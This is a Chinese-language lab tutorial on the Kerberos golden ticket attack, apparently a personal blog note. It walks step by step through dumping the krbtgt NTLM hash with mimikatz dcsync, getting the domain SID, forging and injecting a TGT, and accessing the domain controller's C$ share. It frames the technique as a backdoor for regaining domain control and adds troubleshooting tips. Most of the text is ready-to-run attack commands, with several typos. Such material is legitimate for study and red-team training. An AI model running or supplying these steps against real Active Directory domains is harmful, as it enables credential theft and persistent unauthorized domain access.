金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。
krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。
0x01金票据利用条件
域控中krbtgt账户NTLM密码哈希
域中的sid值
一台域中主机
与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。
0x02实战
环境
域控2k3,ip:10.0.2.15
域内主机07,ip:10.0.2.16
1)在域控中导出krbtgt的ntlm hash lsadump::dcsync /domain:jiu.com /user:krbtgt"
2)获取域的sid,在域成员机中whoami /user
3)使用mimikazt执行 mimikatz "kerberos::golden /user:jiujiu.com /domain:jiu.com /sid: S-1-5-21-2389719689-216894236-2598731090 /krbtgt: 0264754e9f36d010f91dc66bad49149d /ptt" exit
kerberos :: golden:创建黄金
user:jiujiu99伪造的用户
domain:jiu.com域名
sid:id域中sid
krbtft:hash在域控中导出的hash
ppt:将伪造的票据插入到内存中以供使用
4)验证
0x03补充
其中也可以分步创建票据与导入
kerberos::purge
kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
dir \jiu.com\c$
0x04踩坑
1:域成员机不能为03与xp及一下,否则mimikatz导入票据时会出错。(问了别人半天才知道)
2:最后连接为域控计算机全名,不能为IP地址。
3:可通过在cmd下mimikatz log "命令"的方式执行,直接运行mimikatz可能会造成无法复制的尴尬情况
4:域中sid当创建票据时,不要最后一个横线及以后的内容
0x05学习借鉴
https://www.cnblogs.com/backlion/p/8127868.html
https://www.secpulse.com/archives/40497.html
https://www.freebuf.com/sectool/112594.html